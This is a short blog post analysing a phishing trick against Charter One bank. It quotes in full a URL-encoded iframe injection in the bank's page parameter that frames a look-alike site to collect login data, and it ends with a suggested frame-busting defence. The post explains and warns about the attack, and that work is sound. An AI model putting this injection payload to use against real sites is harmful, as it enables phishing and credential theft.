A new phishing exploit

I’ve run across a new phishing exploit–new to me, anyhow. This one is especially pernicious because it actually uses a legitimate bank’s website against itself.

Take a good look at the following URL:

http://www.charterone.com/ legalcenter/do_not_solicit_confirm.asp? name=%3Ciframe+ style%3D%22top%3A120%3B+ left%3A0%3B+ position%3Aabsolute%3B%22+ FRAMEBORDER%3D%220%22+ BORDER%3D%220%22+ width%3D900+ height%3D650+ src%3D%22http%3A%2F%2Fwww.totallyfreebanking.biz%22%

I’ve broken it up and highlighted the salient portions in red. I’ll break down what is happening here. Apparently, Charter One uses (or used–see below) a frame-based interface where the contents of a frame could be specified through the URL. What the scammer has done is set up a mimic site (www.totallyfreebanking.biz) that looks like Charter One’s, and loads in a frame of Charter One’s, but isn’t a part of it, and send the phished data back to the scammer. So even a person who is generally aware of phishing scams might look at this URL and say “Oh, it really is from my bank, it has their URL, it must be OK.”

I visited the page in question, and Charter One seems to have defeated this already.

I don’t want this to be a “frames are bad” rant, because I do think frames have their uses. And in fact, using URLs to specify frame contents goes a long way towards addressing the problem of frame-addressability. But anyone who can’t afford to have an outside party insert content into a frame needs something more subtle–perhaps a javascript detector in the framing page to prevent outside pages appearing in a frame.